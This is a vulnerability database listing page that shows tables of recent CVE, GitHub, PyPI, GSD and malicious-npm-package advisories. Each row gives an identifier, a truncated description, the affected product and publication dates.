Recent vulnerabilities

Vulnerabilities are sorted by update time (recent to old).
ID	CVSS	Description	Vendor	Product	Published	Updated
cve-2025-53624		docusaurus-plugin-content-gists Exposes GitHub Persona…	webbertakken	docusaurus-plugin-content-gists	2025-07-09T21:08:14.595Z	2025-07-09T21:08:14.595Z
cve-2025-0292	5.5 (v3.1)	SSRF in Ivanti Connect Secure before version 22.7…	Ivanti	Connect Secure	2025-07-08T15:33:24.245Z	2025-07-09T20:48:09.166Z
cve-2025-53651	N/A	Jenkins HTML Publisher Plugin 425 and earlier dis…	Jenkins Project	Jenkins HTML Publisher Plugin	2025-07-09T15:39:27.086Z	2025-07-09T20:47:49.813Z
cve-2025-53650	N/A	Jenkins Credentials Binding Plugin 687.v619cb_15e…	Jenkins Project	Jenkins Credentials Binding Plugin	2025-07-09T15:39:26.473Z	2025-07-09T20:47:00.504Z
cve-2025-49604	N/A	For Realtek AmebaD devices, a heap-based buffer o…	n/a	n/a	2025-07-09T00:00:00.000Z	2025-07-09T20:46:07.823Z
cve-2025-44177	N/A	A directory traversal vulnerability was discovere…	n/a	n/a	2025-07-09T00:00:00.000Z	2025-07-09T20:43:43.992Z
cve-2025-52364	N/A	Insecure Permissions vulnerability in Tenda CP3 P…	n/a	n/a	2025-07-09T00:00:00.000Z	2025-07-09T20:41:26.455Z
cve-2025-6377	7.1 (v4.0)	Arena® Simulation Out-Of-Bounds Write Remote Code Exec…	Rockwell Automation	Arena®	2025-07-09T20:12:47.647Z	2025-07-09T20:39:10.481Z
cve-2025-6376	7.1 (v4.0)	Arena® Simulation Out-Of-Bounds Write Remote Code Exec…	Rockwell Automation	Arena®	2025-07-09T20:13:45.320Z	2025-07-09T20:33:10.343Z
cve-2025-49596		MCP Inspector proxy server lacks authentication betwee…	modelcontextprotocol	inspector	2025-06-13T20:11:40.453Z	2025-07-09T20:19:02.667Z
cve-2025-52357	N/A	Cross-Site Scripting (XSS) vulnerability exists i…	n/a	n/a	2025-07-09T00:00:00.000Z	2025-07-09T20:18:32.476Z
cve-2025-5024	7.4 (v3.1)	Gnome-remote-desktop: uncontrolled resource consumptio…	Red Hat	Red Hat Enterprise Linux 10	2025-05-22T14:51:01.110Z	2025-07-09T19:59:27.447Z
cve-2025-6020	7.8 (v3.1)	Linux-pam: linux-pam directory traversal			2025-06-17T12:44:08.646Z	2025-07-09T19:53:02.380Z
cve-2021-27961	N/A	evesys 7.1 (2152) through 8.0 (2202) allows Refle…	n/a	n/a	2025-07-09T00:00:00.000Z	2025-07-09T19:49:15.065Z
cve-2025-44525	N/A	Texas Instruments CC2652RB LaunchPad SimpleLink C…	n/a	n/a	2025-07-09T00:00:00.000Z	2025-07-09T19:43:56.339Z
cve-2025-44526	N/A	Realtek RTL8762EKF-EVB RTL8762E SDK V1.4.0 was di…	n/a	n/a	2025-07-09T00:00:00.000Z	2025-07-09T19:42:34.487Z
cve-2025-53645	N/A	Zimbra Collaboration Suite (ZCS) before 9.0.0 Pat…	n/a	n/a	2025-07-09T00:00:00.000Z	2025-07-09T19:31:25.132Z
cve-2025-47122	7.8 (v3.1)	Adobe Framemaker \| Heap-based Buffer Overflow (CWE-122)	Adobe	Adobe Framemaker	2025-07-08T22:11:15.388Z	2025-07-09T19:27:02.957Z
cve-2025-47131	7.8 (v3.1)	Adobe Framemaker \| Heap-based Buffer Overflow (CWE-122)	Adobe	Adobe Framemaker	2025-07-08T22:11:16.137Z	2025-07-09T19:24:33.508Z
cve-2025-47128	7.8 (v3.1)	Adobe Framemaker \| Integer Underflow (Wrap or Wraparou…	Adobe	Adobe Framemaker	2025-07-08T22:11:17.172Z	2025-07-09T19:22:14.685Z
cve-2025-47126	7.8 (v3.1)	Adobe Framemaker \| Out-of-bounds Write (CWE-787)	Adobe	Adobe Framemaker	2025-07-08T22:11:17.966Z	2025-07-09T19:20:32.334Z
cve-2025-47120	5.5 (v3.1)	Adobe Framemaker \| Stack-based Buffer Overflow (CWE-121)	Adobe	Adobe Framemaker	2025-07-08T22:11:18.712Z	2025-07-09T19:19:32.518Z
cve-2025-36599	4.3 (v3.1)	Dell PowerFlex Manager VM, versions prior to 4.6.…	Dell	PowerFlex Manager VM	2025-07-09T18:30:31.566Z	2025-07-09T19:19:13.688Z
cve-2025-47099	7.8 (v3.1)	InCopy \| Heap-based Buffer Overflow (CWE-122)	Adobe	InCopy	2025-07-08T22:17:09.389Z	2025-07-09T19:18:08.199Z
cve-2025-43594	7.8 (v3.1)	InDesign Desktop \| Out-of-bounds Write (CWE-787)	Adobe	InDesign Desktop	2025-07-08T21:49:02.057Z	2025-07-09T19:16:35.065Z
cve-2025-43592	7.8 (v3.1)	InDesign Desktop \| Access of Uninitialized Pointer (CWE-824)	Adobe	InDesign Desktop	2025-07-08T21:49:02.841Z	2025-07-09T19:16:28.448Z
cve-2025-43591	7.8 (v3.1)	InDesign Desktop \| Heap-based Buffer Overflow (CWE-122)	Adobe	InDesign Desktop	2025-07-08T21:49:03.603Z	2025-07-09T19:16:22.340Z
cve-2025-30313	5.5 (v3.1)	Illustrator \| Out-of-bounds Read (CWE-125)	Adobe	Illustrator	2025-07-08T22:01:03.616Z	2025-07-09T19:16:15.930Z
cve-2025-49526	7.8 (v3.1)	Illustrator \| Out-of-bounds Write (CWE-787)	Adobe	Illustrator	2025-07-08T22:01:04.435Z	2025-07-09T19:16:09.870Z
cve-2025-49530	7.8 (v3.1)	Illustrator \| Out-of-bounds Write (CWE-787)	Adobe	Illustrator	2025-07-08T22:01:05.799Z	2025-07-09T19:16:03.732Z

Vulnerabilities are sorted by update time (recent to old).
ID	CVSS	Description	Vendor	Product	Published	Updated
cve-2025-6377	7.1 (v4.0)	Arena® Simulation Out-Of-Bounds Write Remote Code Exec…	Rockwell Automation	Arena®	2025-07-09T20:12:47.647Z	2025-07-09T20:39:10.481Z
cve-2025-6376	7.1 (v4.0)	Arena® Simulation Out-Of-Bounds Write Remote Code Exec…	Rockwell Automation	Arena®	2025-07-09T20:13:45.320Z	2025-07-09T20:33:10.343Z
cve-2025-53651	N/A	Jenkins HTML Publisher Plugin 425 and earlier dis…	Jenkins Project	Jenkins HTML Publisher Plugin	2025-07-09T15:39:27.086Z	2025-07-09T20:47:49.813Z
cve-2025-53650	N/A	Jenkins Credentials Binding Plugin 687.v619cb_15e…	Jenkins Project	Jenkins Credentials Binding Plugin	2025-07-09T15:39:26.473Z	2025-07-09T20:47:00.504Z
cve-2025-53624		docusaurus-plugin-content-gists Exposes GitHub Persona…	webbertakken	docusaurus-plugin-content-gists	2025-07-09T21:08:14.595Z	2025-07-09T21:08:14.595Z
cve-2025-52364	N/A	Insecure Permissions vulnerability in Tenda CP3 P…	n/a	n/a	2025-07-09T00:00:00.000Z	2025-07-09T20:41:26.455Z
cve-2025-52357	N/A	Cross-Site Scripting (XSS) vulnerability exists i…	n/a	n/a	2025-07-09T00:00:00.000Z	2025-07-09T20:18:32.476Z
cve-2025-49604	N/A	For Realtek AmebaD devices, a heap-based buffer o…	n/a	n/a	2025-07-09T00:00:00.000Z	2025-07-09T20:46:07.823Z
cve-2025-49596		MCP Inspector proxy server lacks authentication betwee…	modelcontextprotocol	inspector	2025-06-13T20:11:40.453Z	2025-07-09T20:19:02.667Z
cve-2025-44177	N/A	A directory traversal vulnerability was discovere…	n/a	n/a	2025-07-09T00:00:00.000Z	2025-07-09T20:43:43.992Z
cve-2025-3295		WP Editor <= 1.2.9.1 - Authenticated (Administrator+) …	benjaminprojas	WP Editor	2025-04-17T05:23:19.325Z	2025-04-17T19:12:57.011Z
cve-2025-6020	7.8 (v3.1)	Linux-pam: linux-pam directory traversal			2025-06-17T12:44:08.646Z	2025-07-09T19:53:02.380Z
cve-2025-5024	7.4 (v3.1)	Gnome-remote-desktop: uncontrolled resource consumptio…	Red Hat	Red Hat Enterprise Linux 10	2025-05-22T14:51:01.110Z	2025-07-09T19:59:27.447Z
cve-2025-53678	N/A	Jenkins User1st uTester Plugin 1.1 and earlier st…	Jenkins Project	Jenkins User1st uTester Plugin	2025-07-09T15:39:43.280Z	2025-07-09T19:12:51.823Z
cve-2025-53677	N/A	Jenkins Xooa Plugin 0.0.7 and earlier does not ma…	Jenkins Project	Jenkins Xooa Plugin	2025-07-09T15:39:42.556Z	2025-07-09T19:12:58.217Z
cve-2025-53676	N/A	Jenkins Xooa Plugin 0.0.7 and earlier stores the …	Jenkins Project	Jenkins Xooa Plugin	2025-07-09T15:39:41.984Z	2025-07-09T19:13:04.643Z
cve-2025-53675	N/A	Jenkins Warrior Framework Plugin 1.2 and earlier …	Jenkins Project	Jenkins Warrior Framework Plugin	2025-07-09T15:39:41.411Z	2025-07-09T19:13:11.179Z
cve-2025-53674	N/A	Jenkins Sensedia Api Platform tools Plugin 1.0 do…	Jenkins Project	Jenkins Sensedia Api Platform tools Plugin	2025-07-09T15:39:40.807Z	2025-07-09T19:13:17.415Z
cve-2025-53673	N/A	Jenkins Sensedia Api Platform tools Plugin 1.0 st…	Jenkins Project	Jenkins Sensedia Api Platform tools Plugin	2025-07-09T15:39:40.223Z	2025-07-09T19:13:23.388Z
cve-2025-53672	N/A	Jenkins Kryptowire Plugin 0.2 and earlier stores …	Jenkins Project	Jenkins Kryptowire Plugin	2025-07-09T15:39:39.579Z	2025-07-09T19:13:29.205Z
cve-2025-53671	N/A	Jenkins Nouvola DiveCloud Plugin 1.08 and earlier…	Jenkins Project	Jenkins Nouvola DiveCloud Plugin	2025-07-09T15:39:39.001Z	2025-07-09T19:13:36.287Z
cve-2025-53670	N/A	Jenkins Nouvola DiveCloud Plugin 1.08 and earlier…	Jenkins Project	Jenkins Nouvola DiveCloud Plugin	2025-07-09T15:39:38.401Z	2025-07-09T19:13:42.645Z
cve-2025-53669	N/A	Jenkins VAddy Plugin 1.2.8 and earlier does not m…	Jenkins Project	Jenkins VAddy Plugin	2025-07-09T15:39:37.810Z	2025-07-09T19:13:48.784Z
cve-2025-53668	N/A	Jenkins VAddy Plugin 1.2.8 and earlier stores Vad…	Jenkins Project	Jenkins VAddy Plugin	2025-07-09T15:39:37.219Z	2025-07-09T19:13:55.206Z
cve-2025-53667	N/A	Jenkins Dead Man's Snitch Plugin 0.1 does not mas…	Jenkins Project	Jenkins Dead Man's Snitch Plugin	2025-07-09T15:39:36.655Z	2025-07-09T19:14:02.674Z
cve-2025-53666	N/A	Jenkins Dead Man's Snitch Plugin 0.1 stores Dead …	Jenkins Project	Jenkins Dead Man's Snitch Plugin	2025-07-09T15:39:36.057Z	2025-07-09T19:14:09.906Z
cve-2025-53665	N/A	Jenkins Apica Loadtest Plugin 1.10 and earlier do…	Jenkins Project	Jenkins Apica Loadtest Plugin	2025-07-09T15:39:35.465Z	2025-07-09T19:14:18.034Z
cve-2025-53664	N/A	Jenkins Apica Loadtest Plugin 1.10 and earlier st…	Jenkins Project	Jenkins Apica Loadtest Plugin	2025-07-09T15:39:34.872Z	2025-07-09T19:14:24.814Z
cve-2025-53663	N/A	Jenkins IBM Cloud DevOps Plugin 2.0.16 and earlie…	Jenkins Project	Jenkins IBM Cloud DevOps Plugin	2025-07-09T15:39:34.283Z	2025-07-09T19:14:31.163Z
cve-2025-53662	N/A	Jenkins IFTTT Build Notifier Plugin 1.2 and earli…	Jenkins Project	Jenkins IFTTT Build Notifier Plugin	2025-07-09T15:39:33.696Z	2025-07-09T19:14:37.396Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
fkie_cve-2024-3025	mintplex-labs/anything-llm is vulnerable to path traversal attacks due to insufficient validation o…	2024-04-10T17:15:55.993	2025-07-09T19:50:01.460
fkie_cve-2024-3101	In mintplex-labs/anything-llm, an improper input validation vulnerability allows attackers to escal…	2024-04-10T17:15:56.417	2025-07-09T19:49:24.520
fkie_cve-2024-3283	A vulnerability in mintplex-labs/anything-llm allows users with manager roles to escalate their pri…	2024-04-10T17:15:56.600	2025-07-09T19:49:06.650
fkie_cve-2024-3569	A Denial of Service (DoS) vulnerability exists in the mintplex-labs/anything-llm repository when th…	2024-04-10T17:15:58.350	2025-07-09T19:38:24.567
fkie_cve-2024-3570	A stored Cross-Site Scripting (XSS) vulnerability exists in the chat functionality of the mintplex-…	2024-04-10T17:15:58.543	2025-07-09T19:38:00.023
fkie_cve-2024-0404	A mass assignment vulnerability exists in the `/api/invite/:code` endpoint of the mintplex-labs/any…	2024-04-16T00:15:07.387	2025-07-09T19:37:47.527
fkie_cve-2024-0549	mintplex-labs/anything-llm is vulnerable to a relative path traversal attack, allowing unauthorized…	2024-04-16T00:15:07.603	2025-07-09T19:37:14.540
fkie_cve-2024-3028	mintplex-labs/anything-llm is vulnerable to improper input validation, allowing attackers to read a…	2024-04-16T00:15:11.667	2025-07-09T19:34:59.663
fkie_cve-2024-3029	In mintplex-labs/anything-llm, an attacker can exploit improper input validation by sending a malfo…	2024-04-16T00:15:11.850	2025-07-09T19:34:23.383
fkie_cve-2024-2913	A race condition vulnerability exists in the mintplex-labs/anything-llm repository, specifically wi…	2024-05-07T00:15:08.590	2025-07-09T19:32:48.117
fkie_cve-2025-25461	A Stored Cross-Site Scripting (XSS) vulnerability exists in SeedDMS 6.0.29. A user or rogue admin w…	2025-02-28T16:15:39.387	2025-07-09T19:32:02.980
fkie_cve-2025-25477	A host header injection vulnerability in SysPass 3.2x allows an attacker to load malicious JS files…	2025-02-28T00:15:36.380	2025-07-09T19:30:45.590
fkie_cve-2025-25476	A stored cross-site scripting (XSS) vulnerability in SysPass 3.2.x allows a malicious user with ele…	2025-02-28T23:15:11.063	2025-07-09T19:30:21.313
fkie_cve-2025-25478	The account file upload functionality in Syspass 3.2.x fails to properly handle special characters …	2025-02-28T23:15:11.170	2025-07-09T19:30:08.437
fkie_cve-2025-3880	The Poll, Survey & Quiz Maker Plugin by Opinion Stage plugin for WordPress is vulnerable to unautho…	2025-06-17T12:15:25.870	2025-07-09T19:25:53.077
fkie_cve-2025-5337	The Slider, Gallery, and Carousel by MetaSlider plugin for WordPress is vulnerable to Stored Cross-…	2025-06-14T10:15:20.153	2025-07-09T19:22:40.480
fkie_cve-2025-5289	The 3D FlipBook – PDF Embedder, PDF Flipbook Viewer, Flipbook Image Gallery plugin for WordPress is…	2025-06-21T11:15:35.240	2025-07-09T19:22:16.377
fkie_cve-2024-11038	The The WPB Popup for Contact Form 7 – Showing The Contact Form 7 Popup on Button Click – CF7 Popup…	2024-11-19T11:15:05.683	2025-07-09T19:21:49.463
fkie_cve-2025-53184	Null pointer dereference vulnerability in the PDF preview module Impact: Successful exploitation of…	2025-07-07T03:15:29.913	2025-07-09T19:16:19.650
fkie_cve-2025-53183	Null pointer dereference vulnerability in the PDF preview module Impact: Successful exploitation of…	2025-07-07T03:15:29.770	2025-07-09T19:15:42.620
fkie_cve-2025-6044	An Improper Access Control vulnerability in the Stylus Tools component of Google ChromeOS version 1…	2025-07-07T19:15:23.920	2025-07-09T19:15:24.587
fkie_cve-2025-53620	@builder.io/qwik-city is the meta-framework for Qwik. When a Qwik Server Action QRL is executed it …	2025-07-09T19:15:24.427	2025-07-09T19:15:24.427
fkie_cve-2025-36599	Dell PowerFlex Manager VM, versions prior to 4.6.2.1, contains an Insertion of Sensitive Informatio…	2025-07-09T19:15:24.207	2025-07-09T19:15:24.207
fkie_cve-2021-27961	evesys 7.1 (2152) through 8.0 (2202) allows Reflected XSS via the indexeva.php action parameter.	2025-07-09T19:15:23.963	2025-07-09T19:15:23.963
fkie_cve-2012-4687	Post Oak AWAM Bluetooth Reader Traffic System does not use a sufficient source of entropy for priva…	2012-12-08T15:55:00.960	2025-07-09T19:15:22.840
fkie_cve-2025-53182	Null pointer dereference vulnerability in the PDF preview module Impact: Successful exploitation of…	2025-07-07T03:15:29.623	2025-07-09T19:15:01.380
fkie_cve-2025-53181	Null pointer dereference vulnerability in the PDF preview module Impact: Successful exploitation of…	2025-07-07T03:15:29.480	2025-07-09T19:14:42.683
fkie_cve-2025-53179	Null pointer dereference vulnerability in the PDF preview module Impact: Successful exploitation of…	2025-07-07T03:15:29.140	2025-07-09T19:14:21.773
fkie_cve-2025-53180	Null pointer dereference vulnerability in the PDF preview module Impact: Successful exploitation of…	2025-07-07T03:15:29.313	2025-07-09T19:14:10.030
fkie_cve-2024-44905	go-pg pg v10.13.0 was discovered to contain a SQL injection vulnerability via the component /types/…	2025-06-12T16:15:22.007	2025-07-09T19:14:06.970

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
ghsa-q8p4-vw42-66gh	Jenkins Apica Loadtest Plugin vulnerability exposes authentication tokens	2025-07-09T18:30:46Z	2025-07-09T21:20:05Z
ghsa-r496-x769-f8j4	Jenkins ReadyAPI Functional Testing Plugin vulnerability exposes secrets	2025-07-09T18:30:46Z	2025-07-09T21:18:51Z
ghsa-j4wf-9gx8-63f8	Jenkins Applitools Eyes Plugin vulnerable to XSS through its Build page	2025-07-09T18:30:46Z	2025-07-09T21:17:35Z
ghsa-8wp4-r84g-gcmw	Jenkins Testsigma Test Plan vulnerability exposes API keys via job configuration form	2025-07-09T18:30:46Z	2025-07-09T21:14:44Z
ghsa-884f-p57j-f258	Jenkins ReadyAPI Functional Testing Plugin vulnerability stores unencrypted authentication credentials	2025-07-09T18:30:46Z	2025-07-09T21:08:00Z
ghsa-26x3-7jw5-7mg4	Jenkins Statistics Gatherer Plugin does not mask AWS Secret Key	2025-07-09T18:30:46Z	2025-07-09T21:06:45Z
ghsa-962q-84v8-hxhj	Jenkins QMetry Test Management Plugin vulnerability exposes API keys	2025-07-09T18:30:46Z	2025-07-09T21:04:35Z
ghsa-3c9f-c64m-h4wc	Jenkins Statistics Gatherer Plugin vulnerability exposes AWS Secret Key	2025-07-09T18:30:45Z	2025-07-09T21:01:13Z
ghsa-3wgg-3j4j-3f69	Jenkins Aqua Security Scanner Plugin vulnerability exposes scanner tokens	2025-07-09T18:30:45Z	2025-07-09T20:58:16Z
ghsa-qcj2-99cg-mppf	Jenkins Git Parameter Plugin vulnerable to code injection due to inexhaustive parameter check	2025-07-09T18:30:45Z	2025-07-09T20:47:01Z
ghsa-367v-5ppj-2hrx	Jenkins HTML Publisher Plugin vulnerability displays controller file system information in its logs	2025-07-09T18:30:45Z	2025-07-09T20:44:31Z
ghsa-9768-hprv-crj5	Jenkins Credentials Binding Plugin vulnerability can expose sensitive information in logger messages	2025-07-09T18:30:44Z	2025-07-09T20:28:31Z
ghsa-7f8r-222p-6f5g	MCP Inspector proxy server lacks authentication between the Inspector client and proxy	2025-06-13T22:15:26Z	2025-07-09T20:18:37Z
ghsa-9mp4-77wg-rwx9	@clerk/backend Performs Insufficient Verification of Data Authenticity	2025-07-09T18:07:40Z	2025-07-09T20:15:13Z
ghsa-qr9h-j6xg-2j72	Qwik's unhandled exception vulnerabilty can cause server crashes from malicious requests	2025-07-09T18:10:29Z	2025-07-09T20:15:06Z
ghsa-hcgh-r5gq-6qc2	Microweber vulnerable to XSS attack due to insure `group` component in its Settings handler	2025-03-12T00:31:50Z	2025-07-09T18:52:05Z
ghsa-w4xv-mj6v-p4g2	Jenkins User1st uTester Plugin 1.1 and earlier stores the uTester JWT token unencrypted in its glob…	2025-07-09T18:30:47Z	2025-07-09T18:30:47Z
ghsa-vx57-hphr-3mr9	Jenkins Sensedia Api Platform tools Plugin 1.0 does not mask the Sensedia API Manager integration t…	2025-07-09T18:30:46Z	2025-07-09T18:30:47Z
ghsa-r6w9-8vpj-6v88	Texas Instruments CC2652RB LaunchPad SimpleLink CC13XX CC26XX SDK 7.41.00.17 was discovered to util…	2025-07-09T18:30:47Z	2025-07-09T18:30:47Z
ghsa-q92v-3f4w-5xg8	Jenkins Applitools Eyes Plugin 1.16.5 and earlier stores Applitools API keys unencrypted in job con…	2025-07-09T18:30:47Z	2025-07-09T18:30:47Z
ghsa-jmrv-rxgr-phvr	Jenkins Applitools Eyes Plugin 1.16.5 and earlier does not mask Applitools API keys displayed on th…	2025-07-09T18:30:47Z	2025-07-09T18:30:47Z
ghsa-93j6-jcjw-3rwp	Jenkins Sensedia Api Platform tools Plugin 1.0 stores the Sensedia API Manager integration token un…	2025-07-09T18:30:46Z	2025-07-09T18:30:47Z
ghsa-92rg-2wcj-32jv	Zimbra Collaboration Suite (ZCS) before 9.0.0 Patch 46, 10.0.x before 10.0.15, and 10.1.x before 10…	2025-07-09T18:30:47Z	2025-07-09T18:30:47Z
ghsa-8gp3-m447-gw2v	Jenkins VAddy Plugin 1.2.8 and earlier does not mask Vaddy API Auth Keys displayed on the job confi…	2025-07-09T18:30:47Z	2025-07-09T18:30:47Z
ghsa-56h7-r62c-83qp	Jenkins Xooa Plugin 0.0.7 and earlier stores the Xooa Deployment Token unencrypted in its global co…	2025-07-09T18:30:47Z	2025-07-09T18:30:47Z
ghsa-4v4v-92cx-x4f4	Jenkins Nouvola DiveCloud Plugin 1.08 and earlier does not mask DiveCloud API Keys and Credentials …	2025-07-09T18:30:46Z	2025-07-09T18:30:47Z
ghsa-2g8w-9933-36vr	Jenkins Warrior Framework Plugin 1.2 and earlier stores passwords unencrypted in job config.xml fil…	2025-07-09T18:30:47Z	2025-07-09T18:30:47Z
ghsa-23j7-px3w-jwp2	Jenkins Xooa Plugin 0.0.7 and earlier does not mask the Xooa Deployment Token on the global configu…	2025-07-09T18:30:47Z	2025-07-09T18:30:47Z
ghsa-pgrx-5f8q-r5mq	Jenkins IBM Cloud DevOps Plugin 2.0.16 and earlier stores SonarQube authentication tokens unencrypt…	2025-07-09T18:30:46Z	2025-07-09T18:30:46Z
ghsa-p9gh-rpjw-78qg	Jenkins QMetry Test Management Plugin 1.13 and earlier stores Qmetry Automation API Keys unencrypte…	2025-07-09T18:30:46Z	2025-07-09T18:30:46Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Package	Published	Updated
pysec-2024-85	Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsD…	mindsdb	2024-09-12T13:15:00Z	2025-07-09T10:23:54.429933Z
pysec-2024-84	Deserialization of untrusted data can occur in versions 23.10.3.0 and newer of the MindsD…	mindsdb	2024-09-12T13:15:00Z	2025-07-09T10:23:54.364605Z
pysec-2024-83	Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsD…	mindsdb	2024-09-12T13:15:00Z	2025-07-09T10:23:54.299938Z
pysec-2024-82	Deserialization of untrusted data can occur in versions 23.3.2.0 and newer of the MindsDB…	mindsdb	2024-09-12T13:15:00Z	2025-07-09T10:23:54.234395Z
pysec-2023-278	MindsDB connects artificial intelligence models to real time data. Versions prior to 23.1…	mindsdb	2023-12-11T21:15:00Z	2025-07-09T10:23:54.149093Z
pysec-2025-68	A vulnerability, which was classified as critical, has been found in Upsonic up to 0.55.6…	upsonic	2025-06-19T21:15:27+00:00	2025-07-08T19:22:27.449399+00:00
pysec-2025-67	A vulnerability classified as critical was found in Upsonic up to 0.55.6. This vulnerabil…	upsonic	2025-06-19T21:15:27+00:00	2025-07-08T19:22:27.385619+00:00
pysec-2025-66	Improper privilege management in a REST interface allowed registered users to access unau…	streampipes	2025-03-03T11:15:11+00:00	2025-07-08T15:23:46.628375+00:00
pysec-2025-65	A path traversal vulnerability exists in run-llama/llama_index versions 0.12.27 through 0…	llama-index	2025-07-07T13:15:28+00:00	2025-07-07T15:23:42.730681+00:00
pysec-2025-61	Pillow is a Python imaging library. In versions 11.2.0 to before 11.3.0, there is a heap …	pillow	2025-07-01T19:15:27Z	2025-07-07T14:12:46.226030Z
pysec-2025-64	A vulnerability classified as critical has been found in themanojdesai python-a2a up to 0…	python-a2a	2025-06-17T07:15:18+00:00	2025-07-02T21:23:13.806273+00:00
pysec-2025-63	vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Whe…	vllm	2025-03-19T16:15:32+00:00	2025-07-01T23:22:49.176005+00:00
pysec-2025-62	vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Mal…	vllm	2025-02-07T20:15:34+00:00	2025-07-01T23:22:49.083695+00:00
pysec-2025-60	Exposure of Sensitive Information to an Unauthorized Actor, Insertion of Sensitive Inform…	apache-iotdb	2025-05-14T11:16:28+00:00	2025-07-01T21:22:47.232036+00:00
pysec-2025-59	Remote Code Execution with untrusted URI of UDF vulnerability in Apache IoTDB. The attack…	apache-iotdb	2025-05-14T11:15:47+00:00	2025-07-01T21:22:47.177405+00:00
pysec-2024-257	Mobile Security Framework (MobSF) is a pen-testing, malware analysis and security assessm…	mobsf	2024-03-22T23:15:07+00:00	2025-06-30T15:23:50.085549+00:00
pysec-2025-58	vLLM is a library for LLM inference and serving. vllm/model_executor/weight_utils.py impl…	vllm	2025-01-27T18:15:41+00:00	2025-06-27T21:22:36.583615+00:00
pysec-2025-57	A Denial of Service (DoS) vulnerability in zenml-io/zenml version 0.66.0 allows unauthent…	zenml	2025-03-20T10:15:48+00:00	2025-06-27T17:22:55.175431+00:00
pysec-2025-56	OctoPrint provides a web interface for controlling consumer 3D printers. In versions up t…	octoprint	2025-04-22T18:15:59+00:00	2025-06-27T17:22:53.513680+00:00
pysec-2024-256	Mobile Security Framework (MobSF) is a pen-testing, malware analysis and security assessm…	mobsf	2024-12-03T16:15:24+00:00	2025-06-27T17:22:53.325430+00:00
pysec-2025-55	vLLM is an inference and serving engine for large language models (LLMs). Version 0.8.0 u…	vllm	2025-05-30T19:15:30+00:00	2025-06-26T21:23:06.407481+00:00
pysec-2025-54	vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8…	vllm	2025-05-30T19:15:30+00:00	2025-06-26T21:23:06.319321+00:00
pysec-2025-53	vLLM is an inference and serving engine for large language models (LLMs). Prior to versio…	vllm	2025-05-29T17:15:21+00:00	2025-06-26T21:23:06.231251+00:00
pysec-2025-52	gateway_proxy_handler in MLflow before 3.1.0 lacks gateway_path validation.	mlflow	2025-06-23T15:15:29+00:00	2025-06-26T21:23:04.639900+00:00
pysec-2025-51	Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) v…	apache-airflow-providers-snowflake	2025-06-24T08:15:24+00:00	2025-06-26T21:23:03.132527+00:00
pysec-2025-50	vLLM, an inference and serving engine for large language models (LLMs), has a Regular Exp…	vllm	2025-05-30T18:15:32+00:00	2025-06-19T03:02:28.572160+00:00
pysec-2024-255	Gradio before 4.20 allows credential leakage on Windows.	gradio	2024-05-05T20:15:07+00:00	2025-06-17T19:21:48.983901+00:00
pysec-2024-254	A session fixation vulnerability exists in the zenml-io/zenml application, where JWT toke…	zenml	2024-04-16T00:15:11+00:00	2025-06-13T00:48:41.806476+00:00
pysec-2025-49	setuptools is a package that allows users to download, build, install, upgrade, and unins…	setuptools	2025-05-17T16:15:19+00:00	2025-06-12T22:23:11.115559+00:00
pysec-2025-48	Mobile Security Framework (MobSF) is a pen-testing, malware analysis and security assessm…	mobsf	2025-03-31T17:15:42+00:00	2025-06-12T22:23:10.476087+00:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description
gsd-2024-33903	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33902	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33901	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33900	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33899	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33898	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33897	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33896	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33895	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33894	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33893	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33892	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33891	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33890	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33889	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33888	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33887	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33886	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33885	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33884	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33883	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4303	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4302	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4301	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4300	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4299	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4298	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4297	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4296	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33882	The format of the source doesn't require a description, click on the link for more details

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
mal-2024-1280	Malicious code in @symplr-ux/alloy-icons (npm)	2024-04-22T08:14:41Z	2024-04-22T08:14:42Z
mal-2024-1291	Malicious code in shard-packages (npm)	2024-04-22T08:02:34Z	2024-04-22T08:02:40Z
mal-2024-1287	Malicious code in ecs-cdk (npm)	2024-04-22T08:02:34Z	2024-04-22T08:02:40Z
mal-2024-1295	Malicious code in teleport-app-example-node (npm)	2024-04-22T08:02:34Z	2024-04-22T08:02:35Z
mal-2024-1293	Malicious code in swift-docc-rendeeeeeer (npm)	2024-04-22T08:02:34Z	2024-04-22T08:02:35Z
mal-2024-1283	Malicious code in cuckoo-3-web-ui-tooling (npm)	2024-04-22T08:02:34Z	2024-04-22T08:02:35Z
mal-2024-1286	Malicious code in djs-status (npm)	2024-04-22T06:18:24Z	2024-04-22T06:18:29Z
